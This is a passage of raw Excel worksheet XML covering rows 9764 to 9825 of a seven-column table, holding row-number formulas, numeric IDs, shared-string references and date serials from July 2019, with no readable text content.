      <c r="F9764" t="s">
        <v>9975</v>
      </c>
      <c r="G9764" t="s">
        <v>19171</v>
      </c>
    </row>
    <row r="9765" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9765">
        <f t="shared" si="152"/>
        <v>9764</v>
      </c>
      <c r="B9765">
        <v>4764</v>
      </c>
      <c r="C9765" t="s">
        <v>9973</v>
      </c>
      <c r="D9765" s="1">
        <v>43674</v>
      </c>
      <c r="E9765" t="s">
        <v>19172</v>
      </c>
      <c r="F9765" t="s">
        <v>9975</v>
      </c>
      <c r="G9765" t="s">
        <v>19173</v>
      </c>
    </row>
    <row r="9766" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9766">
        <f t="shared" si="152"/>
        <v>9765</v>
      </c>
      <c r="B9766">
        <v>4765</v>
      </c>
      <c r="C9766" t="s">
        <v>9973</v>
      </c>
      <c r="D9766" s="1">
        <v>43673</v>
      </c>
      <c r="E9766" t="s">
        <v>19174</v>
      </c>
      <c r="F9766" t="s">
        <v>9975</v>
      </c>
      <c r="G9766" t="s">
        <v>19175</v>
      </c>
    </row>
    <row r="9767" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9767">
        <f t="shared" si="152"/>
        <v>9766</v>
      </c>
      <c r="B9767">
        <v>4766</v>
      </c>
      <c r="C9767" t="s">
        <v>9973</v>
      </c>
      <c r="D9767" s="1">
        <v>43668</v>
      </c>
      <c r="E9767" t="s">
        <v>19176</v>
      </c>
      <c r="F9767" t="s">
        <v>9975</v>
      </c>
      <c r="G9767" t="s">
        <v>19177</v>
      </c>
    </row>
    <row r="9768" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9768">
        <f t="shared" si="152"/>
        <v>9767</v>
      </c>
      <c r="B9768">
        <v>4767</v>
      </c>
      <c r="C9768" t="s">
        <v>9973</v>
      </c>
      <c r="D9768" s="1">
        <v>43676</v>
      </c>
      <c r="E9768" t="s">
        <v>19178</v>
      </c>
      <c r="F9768" t="s">
        <v>9975</v>
      </c>
      <c r="G9768" t="s">
        <v>19179</v>
      </c>
    </row>
    <row r="9769" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9769">
        <f t="shared" si="152"/>
        <v>9768</v>
      </c>
      <c r="B9769">
        <v>4768</v>
      </c>
      <c r="C9769" t="s">
        <v>9973</v>
      </c>
      <c r="D9769" s="1">
        <v>43676</v>
      </c>
      <c r="E9769" t="s">
        <v>19180</v>
      </c>
      <c r="F9769" t="s">
        <v>9975</v>
      </c>
      <c r="G9769" t="s">
        <v>19181</v>
      </c>
    </row>
    <row r="9770" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9770">
        <f t="shared" si="152"/>
        <v>9769</v>
      </c>
      <c r="B9770">
        <v>4769</v>
      </c>
      <c r="C9770" t="s">
        <v>9973</v>
      </c>
      <c r="D9770" s="1">
        <v>43670</v>
      </c>
      <c r="E9770" t="s">
        <v>14357</v>
      </c>
      <c r="F9770" t="s">
        <v>9975</v>
      </c>
      <c r="G9770" t="s">
        <v>19182</v>
      </c>
    </row>
    <row r="9771" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9771">
        <f t="shared" si="152"/>
        <v>9770</v>
      </c>
      <c r="B9771">
        <v>4770</v>
      </c>
      <c r="C9771" t="s">
        <v>9973</v>
      </c>
      <c r="D9771" s="1">
        <v>43670</v>
      </c>
      <c r="E9771" t="s">
        <v>19183</v>
      </c>
      <c r="F9771" t="s">
        <v>9975</v>
      </c>
      <c r="G9771" t="s">
        <v>19184</v>
      </c>
    </row>
    <row r="9772" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9772">
        <f t="shared" si="152"/>
        <v>9771</v>
      </c>
      <c r="B9772">
        <v>4771</v>
      </c>
      <c r="C9772" t="s">
        <v>9973</v>
      </c>
      <c r="D9772" s="1">
        <v>43668</v>
      </c>
      <c r="E9772" t="s">
        <v>19185</v>
      </c>
      <c r="F9772" t="s">
        <v>9975</v>
      </c>
      <c r="G9772" t="s">
        <v>19186</v>
      </c>
    </row>
    <row r="9773" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9773">
        <f t="shared" si="152"/>
        <v>9772</v>
      </c>
      <c r="B9773">
        <v>4772</v>
      </c>
      <c r="C9773" t="s">
        <v>9973</v>
      </c>
      <c r="D9773" s="1">
        <v>43675</v>
      </c>
      <c r="E9773" t="s">
        <v>19187</v>
      </c>
      <c r="F9773" t="s">
        <v>9975</v>
      </c>
      <c r="G9773" t="s">
        <v>19188</v>
      </c>
    </row>
    <row r="9774" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9774">
        <f t="shared" si="152"/>
        <v>9773</v>
      </c>
      <c r="B9774">
        <v>4773</v>
      </c>
      <c r="C9774" t="s">
        <v>9973</v>
      </c>
      <c r="D9774" s="1">
        <v>43673</v>
      </c>
      <c r="E9774" t="s">
        <v>19189</v>
      </c>
      <c r="F9774" t="s">
        <v>9975</v>
      </c>
      <c r="G9774" t="s">
        <v>19190</v>
      </c>
    </row>
    <row r="9775" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9775">
        <f t="shared" si="152"/>
        <v>9774</v>
      </c>
      <c r="B9775">
        <v>4774</v>
      </c>
      <c r="C9775" t="s">
        <v>9973</v>
      </c>
      <c r="D9775" s="1">
        <v>43671</v>
      </c>
      <c r="E9775" t="s">
        <v>12226</v>
      </c>
      <c r="F9775" t="s">
        <v>9975</v>
      </c>
      <c r="G9775" t="s">
        <v>12227</v>
      </c>
    </row>
    <row r="9776" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9776">
        <f t="shared" si="152"/>
        <v>9775</v>
      </c>
      <c r="B9776">
        <v>4775</v>
      </c>
      <c r="C9776" t="s">
        <v>9973</v>
      </c>
      <c r="D9776" s="1">
        <v>43674</v>
      </c>
      <c r="E9776" t="s">
        <v>19191</v>
      </c>
      <c r="F9776" t="s">
        <v>9975</v>
      </c>
      <c r="G9776" t="s">
        <v>19192</v>
      </c>
    </row>
    <row r="9777" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9777">
        <f t="shared" si="152"/>
        <v>9776</v>
      </c>
      <c r="B9777">
        <v>4776</v>
      </c>
      <c r="C9777" t="s">
        <v>9973</v>
      </c>
      <c r="D9777" s="1">
        <v>43674</v>
      </c>
      <c r="E9777" t="s">
        <v>19193</v>
      </c>
      <c r="F9777" t="s">
        <v>9975</v>
      </c>
      <c r="G9777" t="s">
        <v>19194</v>
      </c>
    </row>
    <row r="9778" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9778">
        <f t="shared" si="152"/>
        <v>9777</v>
      </c>
      <c r="B9778">
        <v>4777</v>
      </c>
      <c r="C9778" t="s">
        <v>9973</v>
      </c>
      <c r="D9778" s="1">
        <v>43669</v>
      </c>
      <c r="E9778" t="s">
        <v>19195</v>
      </c>
      <c r="F9778" t="s">
        <v>9975</v>
      </c>
      <c r="G9778" t="s">
        <v>19196</v>
      </c>
    </row>
    <row r="9779" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9779">
        <f t="shared" si="152"/>
        <v>9778</v>
      </c>
      <c r="B9779">
        <v>4778</v>
      </c>
      <c r="C9779" t="s">
        <v>9973</v>
      </c>
      <c r="D9779" s="1">
        <v>43674</v>
      </c>
      <c r="E9779" t="s">
        <v>19197</v>
      </c>
      <c r="F9779" t="s">
        <v>9975</v>
      </c>
      <c r="G9779" t="s">
        <v>19198</v>
      </c>
    </row>
    <row r="9780" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9780">
        <f t="shared" si="152"/>
        <v>9779</v>
      </c>
      <c r="B9780">
        <v>4779</v>
      </c>
      <c r="C9780" t="s">
        <v>9973</v>
      </c>
      <c r="D9780" s="1">
        <v>43670</v>
      </c>
      <c r="E9780" t="s">
        <v>19199</v>
      </c>
      <c r="F9780" t="s">
        <v>9975</v>
      </c>
      <c r="G9780" t="s">
        <v>19200</v>
      </c>
    </row>
    <row r="9781" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9781">
        <f t="shared" si="152"/>
        <v>9780</v>
      </c>
      <c r="B9781">
        <v>4780</v>
      </c>
      <c r="C9781" t="s">
        <v>9973</v>
      </c>
      <c r="D9781" s="1">
        <v>43668</v>
      </c>
      <c r="E9781" t="s">
        <v>19201</v>
      </c>
      <c r="F9781" t="s">
        <v>9975</v>
      </c>
      <c r="G9781" t="s">
        <v>19202</v>
      </c>
    </row>
    <row r="9782" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9782">
        <f t="shared" si="152"/>
        <v>9781</v>
      </c>
      <c r="B9782">
        <v>4781</v>
      </c>
      <c r="C9782" t="s">
        <v>9973</v>
      </c>
      <c r="D9782" s="1">
        <v>43671</v>
      </c>
      <c r="E9782" t="s">
        <v>19203</v>
      </c>
      <c r="F9782" t="s">
        <v>9975</v>
      </c>
      <c r="G9782" t="s">
        <v>19204</v>
      </c>
    </row>
    <row r="9783" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9783">
        <f t="shared" si="152"/>
        <v>9782</v>
      </c>
      <c r="B9783">
        <v>4782</v>
      </c>
      <c r="C9783" t="s">
        <v>9973</v>
      </c>
      <c r="D9783" s="1">
        <v>43677</v>
      </c>
      <c r="E9783" t="s">
        <v>19205</v>
      </c>
      <c r="F9783" t="s">
        <v>9975</v>
      </c>
      <c r="G9783" t="s">
        <v>19206</v>
      </c>
    </row>
    <row r="9784" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9784">
        <f t="shared" si="152"/>
        <v>9783</v>
      </c>
      <c r="B9784">
        <v>4783</v>
      </c>
      <c r="C9784" t="s">
        <v>9973</v>
      </c>
      <c r="D9784" s="1">
        <v>43677</v>
      </c>
      <c r="E9784" t="s">
        <v>19207</v>
      </c>
      <c r="F9784" t="s">
        <v>9975</v>
      </c>
      <c r="G9784" t="s">
        <v>19208</v>
      </c>
    </row>
    <row r="9785" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9785">
        <f t="shared" si="152"/>
        <v>9784</v>
      </c>
      <c r="B9785">
        <v>4784</v>
      </c>
      <c r="C9785" t="s">
        <v>9973</v>
      </c>
      <c r="D9785" s="1">
        <v>43676</v>
      </c>
      <c r="E9785" t="s">
        <v>19209</v>
      </c>
      <c r="F9785" t="s">
        <v>9975</v>
      </c>
      <c r="G9785" t="s">
        <v>19210</v>
      </c>
    </row>
    <row r="9786" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9786">
        <f t="shared" si="152"/>
        <v>9785</v>
      </c>
      <c r="B9786">
        <v>4785</v>
      </c>
      <c r="C9786" t="s">
        <v>9973</v>
      </c>
      <c r="D9786" s="1">
        <v>43675</v>
      </c>
      <c r="E9786" t="s">
        <v>19211</v>
      </c>
      <c r="F9786" t="s">
        <v>10021</v>
      </c>
      <c r="G9786" t="s">
        <v>19212</v>
      </c>
    </row>
    <row r="9787" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9787">
        <f t="shared" si="152"/>
        <v>9786</v>
      </c>
      <c r="B9787">
        <v>4786</v>
      </c>
      <c r="C9787" t="s">
        <v>9973</v>
      </c>
      <c r="D9787" s="1">
        <v>43670</v>
      </c>
      <c r="E9787" t="s">
        <v>19213</v>
      </c>
      <c r="F9787" t="s">
        <v>10021</v>
      </c>
      <c r="G9787" t="s">
        <v>19214</v>
      </c>
    </row>
    <row r="9788" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9788">
        <f t="shared" si="152"/>
        <v>9787</v>
      </c>
      <c r="B9788">
        <v>4787</v>
      </c>
      <c r="C9788" t="s">
        <v>9973</v>
      </c>
      <c r="D9788" s="1">
        <v>43676</v>
      </c>
      <c r="E9788" t="s">
        <v>19215</v>
      </c>
      <c r="F9788" t="s">
        <v>9975</v>
      </c>
      <c r="G9788" t="s">
        <v>19216</v>
      </c>
    </row>
    <row r="9789" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9789">
        <f t="shared" si="152"/>
        <v>9788</v>
      </c>
      <c r="B9789">
        <v>4788</v>
      </c>
      <c r="C9789" t="s">
        <v>9973</v>
      </c>
      <c r="D9789" s="1">
        <v>43672</v>
      </c>
      <c r="E9789" t="s">
        <v>19217</v>
      </c>
      <c r="F9789" t="s">
        <v>9975</v>
      </c>
      <c r="G9789" t="s">
        <v>19218</v>
      </c>
    </row>
    <row r="9790" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9790">
        <f t="shared" si="152"/>
        <v>9789</v>
      </c>
      <c r="B9790">
        <v>4789</v>
      </c>
      <c r="C9790" t="s">
        <v>9973</v>
      </c>
      <c r="D9790" s="1">
        <v>43671</v>
      </c>
      <c r="E9790" t="s">
        <v>19219</v>
      </c>
      <c r="F9790" t="s">
        <v>9975</v>
      </c>
      <c r="G9790" t="s">
        <v>19220</v>
      </c>
    </row>
    <row r="9791" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9791">
        <f t="shared" si="152"/>
        <v>9790</v>
      </c>
      <c r="B9791">
        <v>4790</v>
      </c>
      <c r="C9791" t="s">
        <v>9973</v>
      </c>
      <c r="D9791" s="1">
        <v>43672</v>
      </c>
      <c r="E9791" t="s">
        <v>19221</v>
      </c>
      <c r="F9791" t="s">
        <v>9975</v>
      </c>
      <c r="G9791" t="s">
        <v>19222</v>
      </c>
    </row>
    <row r="9792" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9792">
        <f t="shared" si="152"/>
        <v>9791</v>
      </c>
      <c r="B9792">
        <v>4791</v>
      </c>
      <c r="C9792" t="s">
        <v>9973</v>
      </c>
      <c r="D9792" s="1">
        <v>43671</v>
      </c>
      <c r="E9792" t="s">
        <v>19223</v>
      </c>
      <c r="F9792" t="s">
        <v>9975</v>
      </c>
      <c r="G9792" t="s">
        <v>19224</v>
      </c>
    </row>
    <row r="9793" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9793">
        <f t="shared" si="152"/>
        <v>9792</v>
      </c>
      <c r="B9793">
        <v>4792</v>
      </c>
      <c r="C9793" t="s">
        <v>9973</v>
      </c>
      <c r="D9793" s="1">
        <v>43670</v>
      </c>
      <c r="E9793" t="s">
        <v>19225</v>
      </c>
      <c r="F9793" t="s">
        <v>9975</v>
      </c>
      <c r="G9793" t="s">
        <v>19226</v>
      </c>
    </row>
    <row r="9794" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9794">
        <f t="shared" si="152"/>
        <v>9793</v>
      </c>
      <c r="B9794">
        <v>4793</v>
      </c>
      <c r="C9794" t="s">
        <v>9973</v>
      </c>
      <c r="D9794" s="1">
        <v>43669</v>
      </c>
      <c r="E9794" t="s">
        <v>19227</v>
      </c>
      <c r="F9794" t="s">
        <v>9975</v>
      </c>
      <c r="G9794" t="s">
        <v>19228</v>
      </c>
    </row>
    <row r="9795" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9795">
        <f t="shared" ref="A9795:A9858" si="153">+ROW(A9794)</f>
        <v>9794</v>
      </c>
      <c r="B9795">
        <v>4794</v>
      </c>
      <c r="C9795" t="s">
        <v>9973</v>
      </c>
      <c r="D9795" s="1">
        <v>43672</v>
      </c>
      <c r="E9795" t="s">
        <v>19229</v>
      </c>
      <c r="F9795" t="s">
        <v>9975</v>
      </c>
      <c r="G9795" t="s">
        <v>19230</v>
      </c>
    </row>
    <row r="9796" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9796">
        <f t="shared" si="153"/>
        <v>9795</v>
      </c>
      <c r="B9796">
        <v>4795</v>
      </c>
      <c r="C9796" t="s">
        <v>9973</v>
      </c>
      <c r="D9796" s="1">
        <v>43676</v>
      </c>
      <c r="E9796" t="s">
        <v>19231</v>
      </c>
      <c r="F9796" t="s">
        <v>9975</v>
      </c>
      <c r="G9796" t="s">
        <v>19232</v>
      </c>
    </row>
    <row r="9797" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9797">
        <f t="shared" si="153"/>
        <v>9796</v>
      </c>
      <c r="B9797">
        <v>4796</v>
      </c>
      <c r="C9797" t="s">
        <v>9973</v>
      </c>
      <c r="D9797" s="1">
        <v>43674</v>
      </c>
      <c r="E9797" t="s">
        <v>19233</v>
      </c>
      <c r="F9797" t="s">
        <v>9975</v>
      </c>
      <c r="G9797" t="s">
        <v>19234</v>
      </c>
    </row>
    <row r="9798" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9798">
        <f t="shared" si="153"/>
        <v>9797</v>
      </c>
      <c r="B9798">
        <v>4797</v>
      </c>
      <c r="C9798" t="s">
        <v>9973</v>
      </c>
      <c r="D9798" s="1">
        <v>43668</v>
      </c>
      <c r="E9798" t="s">
        <v>19235</v>
      </c>
      <c r="F9798" t="s">
        <v>9975</v>
      </c>
      <c r="G9798" t="s">
        <v>19236</v>
      </c>
    </row>
    <row r="9799" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9799">
        <f t="shared" si="153"/>
        <v>9798</v>
      </c>
      <c r="B9799">
        <v>4798</v>
      </c>
      <c r="C9799" t="s">
        <v>9973</v>
      </c>
      <c r="D9799" s="1">
        <v>43676</v>
      </c>
      <c r="E9799" t="s">
        <v>19237</v>
      </c>
      <c r="F9799" t="s">
        <v>9975</v>
      </c>
      <c r="G9799" t="s">
        <v>19238</v>
      </c>
    </row>
    <row r="9800" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9800">
        <f t="shared" si="153"/>
        <v>9799</v>
      </c>
      <c r="B9800">
        <v>4799</v>
      </c>
      <c r="C9800" t="s">
        <v>9973</v>
      </c>
      <c r="D9800" s="1">
        <v>43670</v>
      </c>
      <c r="E9800" t="s">
        <v>19239</v>
      </c>
      <c r="F9800" t="s">
        <v>9975</v>
      </c>
      <c r="G9800" t="s">
        <v>19240</v>
      </c>
    </row>
    <row r="9801" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9801">
        <f t="shared" si="153"/>
        <v>9800</v>
      </c>
      <c r="B9801">
        <v>4800</v>
      </c>
      <c r="C9801" t="s">
        <v>9973</v>
      </c>
      <c r="D9801" s="1">
        <v>43671</v>
      </c>
      <c r="E9801" t="s">
        <v>19241</v>
      </c>
      <c r="F9801" t="s">
        <v>10021</v>
      </c>
      <c r="G9801" t="s">
        <v>19242</v>
      </c>
    </row>
    <row r="9802" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9802">
        <f t="shared" si="153"/>
        <v>9801</v>
      </c>
      <c r="B9802">
        <v>4801</v>
      </c>
      <c r="C9802" t="s">
        <v>9973</v>
      </c>
      <c r="D9802" s="1">
        <v>43673</v>
      </c>
      <c r="E9802" t="s">
        <v>19243</v>
      </c>
      <c r="F9802" t="s">
        <v>9975</v>
      </c>
      <c r="G9802" t="s">
        <v>19244</v>
      </c>
    </row>
    <row r="9803" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9803">
        <f t="shared" si="153"/>
        <v>9802</v>
      </c>
      <c r="B9803">
        <v>4802</v>
      </c>
      <c r="C9803" t="s">
        <v>9973</v>
      </c>
      <c r="D9803" s="1">
        <v>43669</v>
      </c>
      <c r="E9803" t="s">
        <v>19245</v>
      </c>
      <c r="F9803" t="s">
        <v>9975</v>
      </c>
      <c r="G9803" t="s">
        <v>19246</v>
      </c>
    </row>
    <row r="9804" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9804">
        <f t="shared" si="153"/>
        <v>9803</v>
      </c>
      <c r="B9804">
        <v>4803</v>
      </c>
      <c r="C9804" t="s">
        <v>9973</v>
      </c>
      <c r="D9804" s="1">
        <v>43674</v>
      </c>
      <c r="E9804" t="s">
        <v>19247</v>
      </c>
      <c r="F9804" t="s">
        <v>9975</v>
      </c>
      <c r="G9804" t="s">
        <v>19248</v>
      </c>
    </row>
    <row r="9805" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9805">
        <f t="shared" si="153"/>
        <v>9804</v>
      </c>
      <c r="B9805">
        <v>4804</v>
      </c>
      <c r="C9805" t="s">
        <v>9973</v>
      </c>
      <c r="D9805" s="1">
        <v>43671</v>
      </c>
      <c r="E9805" t="s">
        <v>19249</v>
      </c>
      <c r="F9805" t="s">
        <v>9975</v>
      </c>
      <c r="G9805" t="s">
        <v>19250</v>
      </c>
    </row>
    <row r="9806" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9806">
        <f t="shared" si="153"/>
        <v>9805</v>
      </c>
      <c r="B9806">
        <v>4805</v>
      </c>
      <c r="C9806" t="s">
        <v>9973</v>
      </c>
      <c r="D9806" s="1">
        <v>43676</v>
      </c>
      <c r="E9806" t="s">
        <v>19251</v>
      </c>
      <c r="F9806" t="s">
        <v>9975</v>
      </c>
      <c r="G9806" t="s">
        <v>19252</v>
      </c>
    </row>
    <row r="9807" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9807">
        <f t="shared" si="153"/>
        <v>9806</v>
      </c>
      <c r="B9807">
        <v>4806</v>
      </c>
      <c r="C9807" t="s">
        <v>9973</v>
      </c>
      <c r="D9807" s="1">
        <v>43670</v>
      </c>
      <c r="E9807" t="s">
        <v>19253</v>
      </c>
      <c r="F9807" t="s">
        <v>9975</v>
      </c>
      <c r="G9807" t="s">
        <v>19254</v>
      </c>
    </row>
    <row r="9808" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9808">
        <f t="shared" si="153"/>
        <v>9807</v>
      </c>
      <c r="B9808">
        <v>4807</v>
      </c>
      <c r="C9808" t="s">
        <v>9973</v>
      </c>
      <c r="D9808" s="1">
        <v>43669</v>
      </c>
      <c r="E9808" t="s">
        <v>19255</v>
      </c>
      <c r="F9808" t="s">
        <v>9975</v>
      </c>
      <c r="G9808" t="s">
        <v>19256</v>
      </c>
    </row>
    <row r="9809" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9809">
        <f t="shared" si="153"/>
        <v>9808</v>
      </c>
      <c r="B9809">
        <v>4808</v>
      </c>
      <c r="C9809" t="s">
        <v>9973</v>
      </c>
      <c r="D9809" s="1">
        <v>43674</v>
      </c>
      <c r="E9809" t="s">
        <v>19257</v>
      </c>
      <c r="F9809" t="s">
        <v>9975</v>
      </c>
      <c r="G9809" t="s">
        <v>19258</v>
      </c>
    </row>
    <row r="9810" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9810">
        <f t="shared" si="153"/>
        <v>9809</v>
      </c>
      <c r="B9810">
        <v>4809</v>
      </c>
      <c r="C9810" t="s">
        <v>9973</v>
      </c>
      <c r="D9810" s="1">
        <v>43676</v>
      </c>
      <c r="E9810" t="s">
        <v>19259</v>
      </c>
      <c r="F9810" t="s">
        <v>9975</v>
      </c>
      <c r="G9810" t="s">
        <v>19260</v>
      </c>
    </row>
    <row r="9811" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9811">
        <f t="shared" si="153"/>
        <v>9810</v>
      </c>
      <c r="B9811">
        <v>4810</v>
      </c>
      <c r="C9811" t="s">
        <v>9973</v>
      </c>
      <c r="D9811" s="1">
        <v>43669</v>
      </c>
      <c r="E9811" t="s">
        <v>19261</v>
      </c>
      <c r="F9811" t="s">
        <v>10021</v>
      </c>
      <c r="G9811" t="s">
        <v>19262</v>
      </c>
    </row>
    <row r="9812" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9812">
        <f t="shared" si="153"/>
        <v>9811</v>
      </c>
      <c r="B9812">
        <v>4811</v>
      </c>
      <c r="C9812" t="s">
        <v>9973</v>
      </c>
      <c r="D9812" s="1">
        <v>43670</v>
      </c>
      <c r="E9812" t="s">
        <v>19263</v>
      </c>
      <c r="F9812" t="s">
        <v>9975</v>
      </c>
      <c r="G9812" t="s">
        <v>19264</v>
      </c>
    </row>
    <row r="9813" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9813">
        <f t="shared" si="153"/>
        <v>9812</v>
      </c>
      <c r="B9813">
        <v>4812</v>
      </c>
      <c r="C9813" t="s">
        <v>9973</v>
      </c>
      <c r="D9813" s="1">
        <v>43668</v>
      </c>
      <c r="E9813" t="s">
        <v>19265</v>
      </c>
      <c r="F9813" t="s">
        <v>9975</v>
      </c>
      <c r="G9813" t="s">
        <v>19266</v>
      </c>
    </row>
    <row r="9814" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9814">
        <f t="shared" si="153"/>
        <v>9813</v>
      </c>
      <c r="B9814">
        <v>4813</v>
      </c>
      <c r="C9814" t="s">
        <v>9973</v>
      </c>
      <c r="D9814" s="1">
        <v>43670</v>
      </c>
      <c r="E9814" t="s">
        <v>19267</v>
      </c>
      <c r="F9814" t="s">
        <v>9975</v>
      </c>
      <c r="G9814" t="s">
        <v>19268</v>
      </c>
    </row>
    <row r="9815" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9815">
        <f t="shared" si="153"/>
        <v>9814</v>
      </c>
      <c r="B9815">
        <v>4814</v>
      </c>
      <c r="C9815" t="s">
        <v>9973</v>
      </c>
      <c r="D9815" s="1">
        <v>43675</v>
      </c>
      <c r="E9815" t="s">
        <v>19269</v>
      </c>
      <c r="F9815" t="s">
        <v>9975</v>
      </c>
      <c r="G9815" t="s">
        <v>19270</v>
      </c>
    </row>
    <row r="9816" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9816">
        <f t="shared" si="153"/>
        <v>9815</v>
      </c>
      <c r="B9816">
        <v>4815</v>
      </c>
      <c r="C9816" t="s">
        <v>9973</v>
      </c>
      <c r="D9816" s="1">
        <v>43670</v>
      </c>
      <c r="E9816" t="s">
        <v>19271</v>
      </c>
      <c r="F9816" t="s">
        <v>9975</v>
      </c>
      <c r="G9816" t="s">
        <v>19272</v>
      </c>
    </row>
    <row r="9817" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9817">
        <f t="shared" si="153"/>
        <v>9816</v>
      </c>
      <c r="B9817">
        <v>4816</v>
      </c>
      <c r="C9817" t="s">
        <v>9973</v>
      </c>
      <c r="D9817" s="1">
        <v>43671</v>
      </c>
      <c r="E9817" t="s">
        <v>19273</v>
      </c>
      <c r="F9817" t="s">
        <v>9975</v>
      </c>
      <c r="G9817" t="s">
        <v>19274</v>
      </c>
    </row>
    <row r="9818" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9818">
        <f t="shared" si="153"/>
        <v>9817</v>
      </c>
      <c r="B9818">
        <v>4817</v>
      </c>
      <c r="C9818" t="s">
        <v>9973</v>
      </c>
      <c r="D9818" s="1">
        <v>43671</v>
      </c>
      <c r="E9818" t="s">
        <v>19275</v>
      </c>
      <c r="F9818" t="s">
        <v>9975</v>
      </c>
      <c r="G9818" t="s">
        <v>19276</v>
      </c>
    </row>
    <row r="9819" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9819">
        <f t="shared" si="153"/>
        <v>9818</v>
      </c>
      <c r="B9819">
        <v>4818</v>
      </c>
      <c r="C9819" t="s">
        <v>9973</v>
      </c>
      <c r="D9819" s="1">
        <v>43676</v>
      </c>
      <c r="E9819" t="s">
        <v>19277</v>
      </c>
      <c r="F9819" t="s">
        <v>9975</v>
      </c>
      <c r="G9819" t="s">
        <v>19278</v>
      </c>
    </row>
    <row r="9820" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9820">
        <f t="shared" si="153"/>
        <v>9819</v>
      </c>
      <c r="B9820">
        <v>4819</v>
      </c>
      <c r="C9820" t="s">
        <v>9973</v>
      </c>
      <c r="D9820" s="1">
        <v>43670</v>
      </c>
      <c r="E9820" t="s">
        <v>19279</v>
      </c>
      <c r="F9820" t="s">
        <v>9975</v>
      </c>
      <c r="G9820" t="s">
        <v>19280</v>
      </c>
    </row>
    <row r="9821" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9821">
        <f t="shared" si="153"/>
        <v>9820</v>
      </c>
      <c r="B9821">
        <v>4820</v>
      </c>
      <c r="C9821" t="s">
        <v>9973</v>
      </c>
      <c r="D9821" s="1">
        <v>43669</v>
      </c>
      <c r="E9821" t="s">
        <v>19281</v>
      </c>
      <c r="F9821" t="s">
        <v>9975</v>
      </c>
      <c r="G9821" t="s">
        <v>19282</v>
      </c>
    </row>
    <row r="9822" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9822">
        <f t="shared" si="153"/>
        <v>9821</v>
      </c>
      <c r="B9822">
        <v>4821</v>
      </c>
      <c r="C9822" t="s">
        <v>9973</v>
      </c>
      <c r="D9822" s="1">
        <v>43669</v>
      </c>
      <c r="E9822" t="s">
        <v>19283</v>
      </c>
      <c r="F9822" t="s">
        <v>9975</v>
      </c>
      <c r="G9822" t="s">
        <v>19284</v>
      </c>
    </row>
    <row r="9823" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9823">
        <f t="shared" si="153"/>
        <v>9822</v>
      </c>
      <c r="B9823">
        <v>4822</v>
      </c>
      <c r="C9823" t="s">
        <v>9973</v>
      </c>
      <c r="D9823" s="1">
        <v>43671</v>
      </c>
      <c r="E9823" t="s">
        <v>19285</v>
      </c>
      <c r="F9823" t="s">
        <v>9975</v>
      </c>
      <c r="G9823" t="s">
        <v>19286</v>
      </c>
    </row>
    <row r="9824" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9824">
        <f t="shared" si="153"/>
        <v>9823</v>
      </c>
      <c r="B9824">
        <v>4823</v>
      </c>
      <c r="C9824" t="s">
        <v>9973</v>
      </c>
      <c r="D9824" s="1">
        <v>43672</v>
      </c>
      <c r="E9824" t="s">
        <v>19287</v>
      </c>
      <c r="F9824" t="s">
        <v>9975</v>
      </c>
      <c r="G9824" t="s">
        <v>19288</v>
      </c>
    </row>
    <row r="9825" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9825">
        <f t="shared" si="153"/>
        <v>9824</v>
      </c>
      <c r="B9825">
        <v>4824</v>
      </c>
      <c r="C9825" t="s">
        <v>9973</v>
      </c>
      <c r="D9825" s="1">
        <v>43671</v>
      </c>
